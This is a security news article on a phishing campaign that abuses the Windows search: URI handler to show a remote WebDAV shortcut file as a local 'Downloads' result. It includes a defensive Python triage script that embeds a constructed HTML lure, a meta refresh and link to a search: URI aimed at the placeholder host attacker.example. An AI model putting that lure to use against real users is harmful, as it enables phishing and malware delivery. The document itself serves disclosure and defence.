Hackers Abuse Windows Search functionality to deploy malware

A recent malware campaign abuses the Windows “search:” URI protocol handler rather than a software vulnerability: attackers embed a search: URI in an HTML attachment, and when the browser follows it Windows hands the request to Windows Explorer. 

Explorer then runs the attacker-supplied search against a remote server and displays a shortcut file (.LNK) hosted there as if it were a legitimate local search result. 

The phishing emails carry a ZIP archive containing an HTML attachment disguised as a document such as an invoice. Compressing the attachment shrinks it and helps it slip past email security scanners that do not inspect compressed content. 

MailMarshal extracts the HTML file from the ZIP archive.

The extra layer of packaging also lends the lure credibility and makes users more likely to open the attachment. The campaign is currently low-volume, but it demonstrates a new technique for phishing attempts. 

Opening the HTML attachment triggers a meta refresh tag that immediately redirects the user’s browser to the malicious URL, in this case a search: URI.  

If the automatic redirect fails (for example, because the browser blocks it), an anchor tag in the same file offers a clickable link to the same URI as a fallback, so the attacker gets a second chance to reach the payload. 

Code snippet of the HTML attachment.

The search: protocol is a legitimate Windows feature that lets applications and web pages open a Windows Explorer search with a pre-filled query. Attackers abuse it to run a search whose parameters, including the location searched and the label shown to the user, they fully control. 

When the redirect fires, the browser shows a prompt asking permission to open Windows Explorer; this is the security measure meant to stop unauthorized handler launches. If the user accepts, Explorer runs the attacker’s query in the background, and the user sees only what looks like a normal search window, not the remote source behind it. 

Browsing prompt triggered upon execution of the search command.

In this campaign the crafted search: URI looked for files named “INVOICE” on an attacker-controlled server hidden behind Cloudflare’s tunneling service, with the results window labelled so that it appeared to be the user’s “Downloads” folder. 

Because the remote location is reached over WebDAV, Explorer presents the remote files as if they were local, which makes the window more convincing. If the user allows the search, the results show a single shortcut file (.LNK) that points to a malicious batch script on the same remote server. 

According to Trustwave SpiderLabs, the batch script itself could not be retrieved at the time of analysis, but the chain clearly shows the tactic: abuse of a trusted Windows feature combined with the user’s trust in familiar-looking files and folders. 
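As an added example (this is not the page’s or Trustwave’s code), the following Python script shows how a defender might triage an attachment like the one described above: unpack the ZIP, pull the search:/search-ms: targets out of the meta refresh and anchor tags, and decode the URI parameters to see what the Explorer search would do. The embedded lure is constructed to match the structure the article describes (meta refresh plus anchor fallback, a query for INVOICE, a WebDAV location, a “Downloads” label); the host attacker.example is a placeholder, not a real indicator, and the article does not show the actual URI used. The query, crumb and displayname parameter names are the ones the search-ms protocol defines; the \\host@SSL\DavWWWRoot form is the path syntax the Windows WebDAV redirector understands.

```python
"""Triage a ZIP-wrapped HTML attachment for redirects to the Windows search:/search-ms: handler.

Added example for this article, not code from the campaign or from Trustwave. The sample
attachment below is constructed to match the structure described in the text; the host
name attacker.example is a placeholder.
"""
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import unquote

SEARCH_SCHEMES = ("search:", "search-ms:")

# Constructed search: URI (assumption, not the real one): look for files named INVOICE
# at a WebDAV location reached over HTTPS (\\host@SSL\DavWWWRoot) and label the
# results window "Downloads" so it looks like the user's own folder.
SAMPLE_URI = (
    "search:query=INVOICE"
    "&crumb=location:%5C%5Cattacker.example%40SSL%5CDavWWWRoot"
    "&displayname=Downloads"
)

# Constructed HTML lure: meta refresh for the automatic redirect, anchor as the fallback.
SAMPLE_HTML = f"""<html><head>
<meta http-equiv="refresh" content="0; url={SAMPLE_URI}">
</head><body>
<a href="{SAMPLE_URI}">Click here if the document does not open</a>
</body></html>"""


def build_sample_zip() -> bytes:
    """Wrap the lure in a ZIP, as the phishing emails do."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("INVOICE.html", SAMPLE_HTML)
    return buf.getvalue()


class SearchUriFinder(HTMLParser):
    """Collect search:/search-ms: URIs from meta refresh tags and anchors."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; url=<target>"; quotes around the target are optional
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
            if m:
                self._record("meta-refresh", m.group(1))
        elif tag == "a" and "href" in a:
            self._record("anchor", a["href"])

    def _record(self, where: str, uri: str) -> None:
        uri = uri.strip()
        if uri.lower().startswith(SEARCH_SCHEMES):
            self.hits.append((where, uri))


def find_search_uris(html: str) -> list[tuple[str, str]]:
    """Return (where, uri) pairs for every search-protocol target in an HTML document."""
    finder = SearchUriFinder()
    finder.feed(html)
    return finder.hits


def parse_search_uri(uri: str) -> tuple[str, dict[str, str]]:
    """Split 'search:key=value&key=value' into its scheme and percent-decoded parameters."""
    scheme, _, rest = uri.partition(":")
    params: dict[str, str] = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        params[key.lower()] = unquote(value)
    return scheme.lower(), params


def is_remote_webdav(crumb: str) -> bool:
    """A location crumb with @SSL or DavWWWRoot means Explorer will search a remote WebDAV share."""
    low = crumb.lower()
    return "@ssl" in low or "davwwwroot" in low


def scan_attachment(zip_bytes: bytes) -> list[dict]:
    """Extract HTML files from the archive and report every search-protocol redirect found."""
    findings: list[dict] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".htm", ".html")):
                continue
            html = zf.read(name).decode("utf-8", errors="replace")
            for where, uri in find_search_uris(html):
                scheme, params = parse_search_uri(uri)
                finding = {"file": name, "where": where, "scheme": scheme}
                finding.update(params)
                finding["remote_webdav"] = is_remote_webdav(params.get("crumb", ""))
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_attachment(build_sample_zip()):
        print(finding)
```

Two hits for one attachment (one from the meta refresh, one from the anchor) is exactly the pattern described above, and a crumb that points at a UNC path with @SSL or DavWWWRoot tells the analyst the "search" would reach out to a remote WebDAV server. Mail gateways that already unpack archives can apply the same check to the extracted HTML.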

Search window displaying results after invoking the search query.

The search-ms:/search: URI protocols can be invoked from HTML documents, and the shortcut file they surface can launch arbitrary scripts. User interaction is required at two points, accepting the browser prompt and opening the shortcut, but attackers rely on the familiar file name and folder label to get those clicks. 

To mitigate this attack, the protocol handlers can be unregistered by deleting their registry keys from an elevated command prompt: reg delete HKEY_CLASSES_ROOT\search /f and reg delete HKEY_CLASSES_ROOT\search-ms /f. Note that this disables every use of search: and search-ms: links, including legitimate ones, so test the change before rolling it out widely. 

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers various cyber security incidents happening in cyberspace.
